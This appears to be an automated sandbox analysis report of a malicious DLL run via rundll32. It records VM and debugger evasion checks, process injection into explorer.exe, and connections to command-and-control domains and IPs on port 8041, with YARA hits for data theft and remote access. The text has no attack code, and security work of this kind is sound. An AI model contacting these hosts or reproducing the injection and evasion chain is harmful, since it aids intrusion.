                  Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: explorer.exe, 0000001E.00000000.1575778236.0000000000A44000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
                  Source: Amcache.hve.9.dr Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                  Source: Amcache.hve.9.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000087C0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
                  Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.9.dr Binary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.9.dr Binary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual RAM
                  Source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
                  Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000088E9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
                  Source: explorer.exe, 0000001E.00000000.1575778236.0000000000A44000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000088E9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 0000001E.00000000.1575778236.0000000000A44000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: Amcache.hve.9.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\rundll32.exe API call chain: ExitProcess graph end node graph_23-19527
                  Source: C:\Windows\System32\rundll32.exe Process queried: DebugPort
                  Source: C:\Windows\System32\rundll32.exe Code function: 23_2_0000029F3B8ECCE0 LdrGetProcedureAddress,23_2_0000029F3B8ECCE0
                  Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800402A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00000001800402A0
                  Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004A5BC GetProcessHeap,3_2_000000018004A5BC
                  Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005C2BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000000018005C2BC

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\System32\rundll32.exe Network Connect: 82.115.223.39 8041
                  Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 443
                  Source: C:\Windows\System32\rundll32.exe Network Connect: 80.78.24.30 8041
                  Source: C:\Windows\System32\rundll32.exe Memory allocated: C:\Windows\explorer.exe base: 89D0000 protect: page execute and read and write
                  Source: C:\Windows\System32\rundll32.exe Code function: 23_3_00007DF49BA40100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,23_3_00007DF49BA40100
                  Source: C:\Windows\System32\rundll32.exe Code function: 23_2_0000000273F41380 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,23_2_0000000273F41380
                  Source: C:\Windows\System32\rundll32.exe Thread created: C:\Windows\explorer.exe EIP: 89D0000
                  Source: C:\Windows\System32\rundll32.exe Memory written: C:\Windows\explorer.exe base: 89D0000 value starts with: 4D5A
                  Source: C:\Windows\System32\rundll32.exe Memory written: PID: 3504 base: 89D0000 value: 4D
                  Source: C:\Windows\System32\rundll32.exe Thread register set: target process: 7468
                  Source: C:\Windows\System32\rundll32.exeThread register set: 7468 1Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 89D0000Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1Jump to behavior
                  Source: explorer.exe, 0000001E.00000002.2572889646.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575987079.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                  Source: explorer.exe, 0000001E.00000002.2572889646.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584248652.0000000004480000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575987079.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 0000001E.00000002.2572889646.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575987079.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 0000001E.00000002.2572889646.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575987079.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: explorer.exe, 0000001E.00000002.2567357911.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575778236.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanq
                  Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_0000000180053038
                  Source: C:\Windows\System32\rundll32.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,3_2_0000000180052534
                  Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,3_2_0000000180052904
                  Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,3_2_00000001800529D4
                  Source: C:\Windows\System32\rundll32.exe | Code function: GetLocaleInfoW,3_2_0000000180048A24
                  Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,3_2_0000000180047A78
                  Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,3_2_0000000180047BBC
                  Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,3_2_0000000180047C44
                  Source: C:\Windows\System32\rundll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0000000180052E38
                  Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000000180048AB4 GetSystemTimeAsFileTime,3_2_0000000180048AB4
                  Source: C:\Windows\System32\rundll32.exe | Code function: 23_2_0000029F3B904D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,23_2_0000029F3B904D00
                  Source: C:\Windows\explorer.exe | Code function: 30_2_089E00E8 RtlGetVersion,30_2_089E00E8
                  Source: Amcache.hve.9.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.9.dr | Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.9.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.9.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.9.dr | Binary or memory string: MsMpEng.exe
                  Source: C:\Windows\System32\rundll32.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 23.2.rundll32.exe.29f3b750000.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 23.2.rundll32.exe.29f3b6b0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 23.2.rundll32.exe.29f3b750000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000017.00000002.2578334597.0000029F3B6B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000017.00000002.2575784572.0000029F39C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR
                  Source: Yara match | File source: 00000017.00000003.1574746232.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000017.00000003.1574660950.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001E.00000002.2587836163.0000000008AAC000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3504, type: MEMORYSTR
                  Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: 23.2.rundll32.exe.29f3b750000.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 23.2.rundll32.exe.29f3b6b0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 23.2.rundll32.exe.29f3b750000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000017.00000002.2578334597.0000029F3B6B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000017.00000002.2575784572.0000029F39C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR
                  Source: Yara match | File source: 00000017.00000003.1574746232.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000017.00000003.1574660950.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001E.00000002.2587836163.0000000008AAC000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3504, type: MEMORYSTR
                  Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 912 Process Injection | 1 Disable or Modify Tools | 21 Input Capture | 1 System Time Discovery | Remote Services | 21 Input Capture | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 41 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 912 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 113 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Rundll32 | Cached Domain Credentials | 1 Account Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 1 System Owner/User Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 2 File and Directory Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 13 System Information Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                  [Behavior graph: ID: 1525190, Sample: vierm_soft_x64.dll.exe, Startdate: 03/10/2024, Architecture: WINDOWS, Score: 100]

                  Source | Detection | Scanner | Label | Link
                  vierm_soft_x64.dll.dll | 8% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe |
                  https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe |
                  https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe |
                  https://excel.office.com | 0% | URL Reputation | safe |
                  https://word.office.com | 0% | URL Reputation | safe |
                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe |
                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe |
                  https://outlook.com | 0% | URL Reputation | safe |
                  https://android.notify.windows.com/iOS | 0% | URL Reputation | safe |
                  http://schemas.micro | 0% | URL Reputation | safe |
                  https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe |
                  http://x1.c.lencr.org/0 | 0% | URL Reputation | safe |
                  http://x1.i.lencr.org/0 | 0% | URL Reputation | safe |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  isomicrotich.com | 188.114.96.3 | true | true | | unknown
                  greshunka.com | 82.115.223.39 | true | true | | unknown
                  tiguanin.com | 80.78.24.30 | true | true | | unknown
                  bazarunet.com | 80.78.24.30 | true | true | | unknown
                  Name | Malicious | Antivirus Detection | Reputation
                  https://isomicrotich.com/test/ | true | | unknown
                  https://opewolumeras.com/test/ | true | | unknown
                  Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                            unknown
                                                                                                            https://tiguanin.com:8041/in.com:8041/rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://android.notify.windows.com/iOSZMexplorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://android.notify.windows.com/iOSexplorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://www.yelp.comexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://tiguanin.com:8041/prundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://greshunka.com:8041/rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://bazarunet.com:8041/%rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://tiguanin.com/zirundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://r10.i.lencr.org/0rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731677122.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848849900.0000029F3BE0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1574607542.0000029F3B856000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644516828.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644479966.0000029F3B858000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848954010.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2366245082.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029246377.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2218239826.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2218316136.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, 
rundll32.exe, 00000017.00000003.1731411754.0000029F3BE0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://r10.o.lencrundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2578798813.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-darkexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://api.msn.com/v1/news/Feed/Windows?z$explorer.exe, 0000001E.00000000.1578935505.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008685000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-darkexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://tiguanin.com:8041/bazar.phpnrundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://bazarunet.com:8041/admin.phpNrundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://tiguanin.com:8041/bazar.phpkrundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://tiguanin.com:8041/Erundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-distexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://isomicrotich.com/aexplorer.exe, 0000001E.00000002.2591885032.000000000BEC0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://tiguanin.com:8041/;rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://greshunka.com/virundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://greshunka.com:8041/0rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://schemas.microexplorer.exe, 0000001E.00000000.1578069670.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1578735693.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1576236568.0000000002C60000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://parade.com/61481/toriavey/where-did-hamburgers-originateexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://tiguanin.com:8041/Nrundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://greshunka.com:8041/)rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://api.msn.com/~Texplorer.exe, 0000001E.00000000.1578935505.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008796000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://greshunka.com/~irundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhbexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
